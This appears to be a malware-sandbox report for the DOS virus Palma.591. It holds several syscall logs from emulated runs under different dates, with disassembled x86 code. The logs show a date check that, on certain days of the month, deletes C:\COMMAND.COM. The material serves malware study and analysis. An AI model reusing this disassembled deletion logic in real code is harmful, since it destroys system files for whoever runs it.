Sample viewer

vx.netlux.org/Virus.DOS.Palma.591

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:41:42.587643401Z	42	PC: 13e61 \| Get date 0x13e61: cmp dl, 0xf 0x13e64: jb 0x13e74 0x13e66: cmp dl, 0x12 0x13e69: jae 0x13e74 0x13e6b: mov ah, 0x41 0x13e6d: mov dx, 0x333 0x13e70: add dx, bp 0x13e72: int 0x21 0x13e74: push di 0x13e75: jmp 0x13e78 0x13e77: nop 0x13e78: mov byte ptr ds:[bp + 0x142], 0xc3 0x13e7e: nop 0x13e7f: pop di 0x13e80: mov byte ptr ds:[bp + 0x142], 0x90 0x13e86: mov ah, 0x19 0x13e88: int 0x21 0x13e8a: mov byte ptr ds:[bp + 0x349], al 0x13e8f: mov dl, 4 0x13e91: mov byte ptr ds:[bp + 0x348], dl
2018-12-17T22:41:42.591209558Z	65	PC: 13e74 \| Delete file (Filename = 'C:\COMMAND.COM')
2018-12-17T22:41:42.942394639Z	0	PC: 140ce \| Program terminate

{"DateBased":true,"Day":15,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7306,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:20.668805831Z	42	PC: 13e61 \| Get date 0x13e61: cmp dl, 0xf 0x13e64: jb 0x13e74 0x13e66: cmp dl, 0x12 0x13e69: jae 0x13e74 0x13e6b: mov ah, 0x41 0x13e6d: mov dx, 0x333 0x13e70: add dx, bp 0x13e72: int 0x21 0x13e74: push di 0x13e75: jmp 0x13e78 0x13e77: nop 0x13e78: mov byte ptr ds:[bp + 0x142], 0xc3 0x13e7e: nop 0x13e7f: pop di 0x13e80: mov byte ptr ds:[bp + 0x142], 0x90 0x13e86: mov ah, 0x19 0x13e88: int 0x21 0x13e8a: mov byte ptr ds:[bp + 0x349], al 0x13e8f: mov dl, 4 0x13e91: mov byte ptr ds:[bp + 0x348], dl
2018-12-25T12:01:20.670594867Z	65	PC: 13e74 \| Delete file (Filename = 'C:\COMMAND.COM')
2018-12-25T12:01:21.020727017Z	0	PC: 140ce \| Program terminate

{"DateBased":true,"Day":19,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7306,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:21.147505695Z	42	PC: 13e61 \| Get date 0x13e61: cmp dl, 0xf 0x13e64: jb 0x13e74 0x13e66: cmp dl, 0x12 0x13e69: jae 0x13e74 0x13e6b: mov ah, 0x41 0x13e6d: mov dx, 0x333 0x13e70: add dx, bp 0x13e72: int 0x21 0x13e74: push di 0x13e75: jmp 0x13e78 0x13e77: nop 0x13e78: mov byte ptr ds:[bp + 0x142], 0xc3 0x13e7e: nop 0x13e7f: pop di 0x13e80: mov byte ptr ds:[bp + 0x142], 0x90 0x13e86: mov ah, 0x19 0x13e88: int 0x21 0x13e8a: mov byte ptr ds:[bp + 0x349], al 0x13e8f: mov dl, 4 0x13e91: mov byte ptr ds:[bp + 0x348], dl
2018-12-25T12:01:21.150484698Z	42	PC: 140ce \| Get date 0x140ce: mov dx, 0x996a 0x140d1: call 0x1941e 0x140d4: push ds 0x140d5: mov ax, 0x43b 0x140d8: mov dh, 0xff 0x140da: call 0x19515 0x140dd: mov cx, 0x4e59 0x140e0: jb 0x140e4 0x140e2: mov cx, word ptr [si] 0x140e4: pop ds 0x140e5: mov ah, 8 0x140e7: int 0x21 0x140e9: test al, al 0x140eb: jne 0x140fd 0x140ed: mov ah, 8 0x140ef: int 0x21 0x140f1: cmp al, 0x3f 0x140f3: jne 0x140e5 0x140f5: or byte ptr es:[0x531], 0x40 0x140fb: jmp 0x140ab
2018-12-25T12:01:21.153920285Z	64	PC: 19838 \| Write file or device (Write 32 bytes on handle 2)
2018-12-25T12:01:21.156885534Z	64	PC: 19838 \| Write file or device (See above)
2018-12-25T12:01:21.160311468Z	100	PC: 19d8b \| Set wait for external event flag

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7306,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:21.163051379Z	42	PC: 13e61 \| Get date 0x13e61: cmp dl, 0xf 0x13e64: jb 0x13e74 0x13e66: cmp dl, 0x12 0x13e69: jae 0x13e74 0x13e6b: mov ah, 0x41 0x13e6d: mov dx, 0x333 0x13e70: add dx, bp 0x13e72: int 0x21 0x13e74: push di 0x13e75: jmp 0x13e78 0x13e77: nop 0x13e78: mov byte ptr ds:[bp + 0x142], 0xc3 0x13e7e: nop 0x13e7f: pop di 0x13e80: mov byte ptr ds:[bp + 0x142], 0x90 0x13e86: mov ah, 0x19 0x13e88: int 0x21 0x13e8a: mov byte ptr ds:[bp + 0x349], al 0x13e8f: mov dl, 4 0x13e91: mov byte ptr ds:[bp + 0x348], dl
2018-12-25T12:01:21.166119507Z	42	PC: 140ce \| Get date 0x140ce: mov dx, 0x996a 0x140d1: call 0x1941e 0x140d4: push ds 0x140d5: mov ax, 0x43b 0x140d8: mov dh, 0xff 0x140da: call 0x19515 0x140dd: mov cx, 0x4e59 0x140e0: jb 0x140e4 0x140e2: mov cx, word ptr [si] 0x140e4: pop ds 0x140e5: mov ah, 8 0x140e7: int 0x21 0x140e9: test al, al 0x140eb: jne 0x140fd 0x140ed: mov ah, 8 0x140ef: int 0x21 0x140f1: cmp al, 0x3f 0x140f3: jne 0x140e5 0x140f5: or byte ptr es:[0x531], 0x40 0x140fb: jmp 0x140ab
2018-12-25T12:01:21.170291996Z	64	PC: 19838 \| Write file or device (Write 32 bytes on handle 2)
2018-12-25T12:01:21.173740809Z	64	PC: 19838 \| Write file or device (See above)
2018-12-25T12:01:21.176750688Z	100	PC: 19d8b \| Set wait for external event flag